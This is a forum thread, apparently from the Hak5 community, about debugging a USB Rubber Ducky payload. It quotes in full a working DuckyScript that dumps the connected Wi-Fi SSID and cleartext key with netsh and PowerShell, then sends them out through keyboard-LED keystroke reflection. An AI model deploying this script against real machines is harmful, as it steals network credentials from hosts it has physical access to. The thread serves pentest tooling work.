geekintheshell Posted March 24, 2023 Share Posted March 24, 2023 I start with a blank payload screen (Payload Studio Community) , paste code as plain text from example https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-3. I can see the powershell commands executing but a loot file is never created. What am I missing? Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 24, 2023 Share Posted March 24, 2023 Are you linking to the correct example? I can't see any PowerShell commands there (example 2 has such though). Link to comment Share on other sites More sharing options...
geekintheshell Posted March 24, 2023 Author Share Posted March 24, 2023 Here's the whole script from the example (PS cmds in bold ) REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows REM Saves currently connected wireless LAN profile (SSID & Key) to DUCKY ATTACKMODE HID LED_OFF DELAY 2000 SAVE_HOST_KEYBOARD_LOCK_STATE $_EXFIL_MODE_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE REM Store the currently connected wireless LAN SSID & Key to %tmp%\z GUI r DELAY 100 STRING powershell "netsh wlan show profile name=(Get-NetConnectionProfile) STRING .Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z" ENTER DELAY 100 REM Convert the stored credentials into CAPSLOCK and NUMLOCK values. GUI r DELAY 100 STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80, STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z" ENTER DELAY 100 REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky. GUI r DELAY 100 STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms; STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z" ENTER DELAY 100 REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete. WAIT_FOR_SCROLL_CHANGE LED_G $_EXFIL_MODE_ENABLED = FALSE RESTORE_HOST_KEYBOARD_LOCK_STATE Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 24, 2023 Share Posted March 24, 2023 Yeah, that's example 2, and with that sorted, what output do you get if you run the first PowerShell command manually from the Windows run dialog (GUI r) on the target machine? Does the target machine have any wireless networks configured? Link to comment Share on other sites More sharing options...
geekintheshell Posted March 24, 2023 Author Share Posted March 24, 2023 Thank you, I wasn't seeing that the 1st PS cmd was not executing completely since it goes away so fast on screen. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 24, 2023 Share Posted March 24, 2023 Running target side stuff manually is often a good way when troubleshooting while developing payloads. Especially in PowerShell when windows might just pop up and disappear. Using the -NoExit flag might be helpful in such cases if starting from the Windows Run Dialog. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.